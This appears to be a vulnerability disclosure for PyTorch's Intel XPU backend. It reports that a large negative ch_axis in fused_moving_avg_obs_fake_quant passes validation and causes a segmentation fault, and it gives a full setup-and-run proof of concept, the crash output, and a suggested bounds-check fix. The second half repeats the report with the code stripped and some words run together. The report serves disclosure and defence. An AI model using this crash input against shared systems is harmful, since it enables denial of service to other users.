The Intel XPU implementation of fused_moving_avg_obs_fake_quant_xpu validates only the upper bound of ch_axis:
TORCH_CHECK(
ch_axis < x.dim(),
"Error in fused_moving_avg_obs_fq_helper: ch_axis must be < "
"self.dim()");
However, in the per_row_fq path, the same value is later used as an index into a native DimVector:
auto res = DimVector(x.sizes());
std::iota(res.begin(), res.end(), 0);
res[ch_axis] = 0;
res[0] = ch_axis;
y = x.permute(res);
There is no lower-bound validation such as:
or canonicalization through a dimension-wrapping helper such as maybe_wrap_dim.
A large negative ch_axis therefore passes the explicit check (ch_axis < x.dim()) and reaches native C++ code in the XPU backend. In testing, this causes a deterministic segmentation fault in libtorch_xpu.so.
This is reachable from public Python APIs in the Intel XPU PyTorch wheel.
Proof of Concept
The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.
set -euo pipefail
mkdir -p ~/intel-xpu-research
python3 -m venv ~/venvs/torch-xpu-wheel
source ~/venvs/torch-xpu-wheel/bin/activate
python -m pip install --upgrade pip setuptools wheel
# Install PyTorch / torchvision / torchaudio XPU wheels.
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/xpu
# Optional sanity check: verify that the Intel XPU backend is visible.
python - <<'PY'
import torch
print("torch:", torch.__version__)
print("xpu available:", torch.xpu.is_available())
if torch.xpu.is_available():
print("xpu device:", torch.xpu.get_device_name(0))
PY
# Write the PoC from the terminal.
cat > ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py <<'PY'
import os
import torch
print("torch:", torch.__version__, flush=True)
print("torch file:", torch.__file__, flush=True)
print("xpu available:", torch.xpu.is_available(), flush=True)
print("xpu device:", torch.xpu.get_device_name(0), flush=True)
print("LD_LIBRARY_PATH:", os.environ.get("LD_LIBRARY_PATH", ""), flush=True)
device = "xpu"
x = torch.full((1,), 0.5, device=device, dtype=torch.float64)
observer_on = torch.full((1,), 1, device=device, dtype=torch.int32)
fake_quant_on = torch.full((1,), 1, device=device, dtype=torch.int64)
running_min = torch.full((1,), 0.5, device=device, dtype=torch.float64)
running_max = torch.full((1,), 0.5, device=device, dtype=torch.float64)
scale = torch.full((1,), 0.5, device=device, dtype=torch.float64)
zero_point = torch.full((1,), 0.5, device=device, dtype=torch.float64)
print("calling public torch.fused_moving_avg_obs_fake_quant", flush=True)
out = torch.fused_moving_avg_obs_fake_quant(
x,
observer_on,
fake_quant_on,
running_min,
running_max,
scale,
zero_point,
0.0,
0,
0,
-1250999896764,
True,
True,
)
torch.xpu.synchronize()
print("returned:", out, flush=True)
PY
# Run the PoC with a clean dynamic-library environment.
env -u LD_LIBRARY_PATH -u LD_PRELOAD -u SYCL_PI_TRACE \
PYTHONFAULTHANDLER=1 \
TORCH_SHOW_CPP_STACKTRACES=1 \
TORCH_DISABLE_ADDR2LINE=1 \
MALLOC_CHECK_=3 \
MALLOC_PERTURB_=165 \
ONEAPI_DEVICE_SELECTOR=level_zero:gpu \
python ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py
echo "exit code: $?"
The process crashes with a segmentation fault:
torch: 2.9.1+xpu
xpu available: True
xpu device: Intel(R) Graphics [0x7d67]
LD_LIBRARY_PATH:
Fatal Python error: Segmentation fault
Current thread ... [python] (most recent call first):
File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 19 in run_case
File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 103 in <module>
Current thread's C stack trace:
...
Binary file ".../torch/lib/libtorch_xpu.so", at +0x616d2df
Binary file ".../torch/lib/libtorch_xpu.so", at +0x62043f7
Binary file ".../torch/lib/libtorch_xpu.so", at +0x6204491
Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::redispatch(...)
Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::call(...)
...
Segmentation fault
exit code: 139
The same crash was also reproduced through the helper-path operator with:
torch._fused_moving_avg_obs_fq_helper(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=False)
and through the public operator with:
torch.fused_moving_avg_obs_fake_quant(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=True)
Both crashed with exit code 139 and stack frames in libtorch_xpu.so.
Impact
A caller who can execute PyTorch code in a process using the Intel XPU backend can crash the process by passing a crafted negative ch_axis to the public fake-quantization operator.
Impact:
Native segmentation fault in libtorch_xpu.so
Process termination / denial of service
Potential memory corruption due to unchecked native indexing
Affects public Python API usage, not only internal C++ calls
Recommended solution
Add explicit lower-bound validation or canonicalization for ch_axis before it is used.
For example:
TORCH_CHECK(
ch_axis >= 0 && ch_axis < x.dim(),
"Error in fused_moving_avg_obs_fq_helper: ch_axis must be >= 0 and < self.dim()");
The Intel XPU implementation of
fused_moving_avg_obs_fake_quant_xpuvalidates only the upper bound ofch_axis:However, in the
per_row_fqpath, the same value is later used as an index into a nativeDimVector:There is no lower-bound validation such as:
ch_axis >= 0or canonicalization through a dimension-wrapping helper such as
maybe_wrap_dim.A large negative
ch_axistherefore passes the explicit check (ch_axis < x.dim()) and reaches native C++ code in the XPU backend. In testing, this causes a deterministic segmentation fault inlibtorch_xpu.so.This is reachable from public Python APIs in the Intel XPU PyTorch wheel.
Proof of Concept
The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.
The process crashes with a segmentation fault:
The same crash was also reproduced through the helper-path operator with:
and through the public operator with:
Both crashed with
exit code 139and stack frames inlibtorch_xpu.so.Impact
A caller who can execute PyTorch code in a process using the Intel XPU backend can crash the process by passing a crafted negative ch_axis to the public fake-quantization operator.
Impact:
Native segmentation fault in libtorch_xpu.so
Process termination / denial of service
Potential memory corruption due to unchecked native indexing
Affects public Python API usage, not only internal C++ calls
Recommended solution
Add explicit lower-bound validation or canonicalization for ch_axis before it is used.
For example: